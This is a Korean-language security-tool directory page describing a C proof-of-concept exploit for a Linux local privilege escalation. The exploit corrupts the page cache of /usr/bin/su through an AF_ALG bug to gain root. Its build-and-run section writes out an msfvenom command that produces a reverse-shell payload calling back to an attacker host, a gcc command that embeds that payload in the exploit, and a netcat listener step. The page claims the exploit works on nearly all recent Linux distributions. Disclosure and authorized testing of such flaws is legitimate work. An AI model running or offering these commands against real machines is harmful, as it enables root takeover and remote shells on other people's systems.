Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mcub3/cve-2026-31431
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPayload DevelopmentBinary Exploitation
GitHubmcub3/cve-2026-31431

CVE-2026-31431

CVE-2026-31431에 대한 C PoC로, AF_ALG 페이지 캐시 손상을 악용하여 /usr/bin/su를 덮어쓰고 루트 권한을 획득하는 비특권 Linux LPE입니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31431 (Copy Fail) — C PoC

AF_ALG의 로직 버그(커널 4.14 → 2026년 초)를 통해 읽기 가능한 모든 파일의 페이지 캐시에 제어된 4바이트를 기록하는, 권한이 없는 간단한 LPE입니다.

메모리 내의 /usr/bin/su를 손상시킨 후 실행하면 → root 권한 획득.

Exploit 스크린샷

빌드 및 실행

root@kitploit:~
# 1. ELF 페이로드 생성 (리버스 셸 예시)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. 컴파일 (정적, 스트립, .incbin을 통해 페이로드 내장)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. 먼저 리스너 실행 (nc -lvp <LPORT>), 그 다음 대상 호스트에서 익스플로잇 실행
./copy_fail_x86

주요 세부 사항

• CVE: CVE-2026-31431 • CVSS: 7.8 • 수정: 커밋 a664bf3d603d

• 2017–2026년의 사실상 모든 Linux 배포판에서 동작 (컨테이너 포함).

• 기법: /usr/bin/su를 O_RDONLY로 열고, AEAD 제자리 복호화를 악용하여 VFS를 우회하고 제작된 페이로드를 페이지 캐시에 직접 스플라이스.

• 원본 공개 및 732바이트 Python PoC → https://copy.fail

라이선스

MIT – LICENSE 참조. 교육 및 승인된 테스트 용도로만 사용하세요. 사용에 따른 책임은 본인에게 있습니다.

도구 다운로드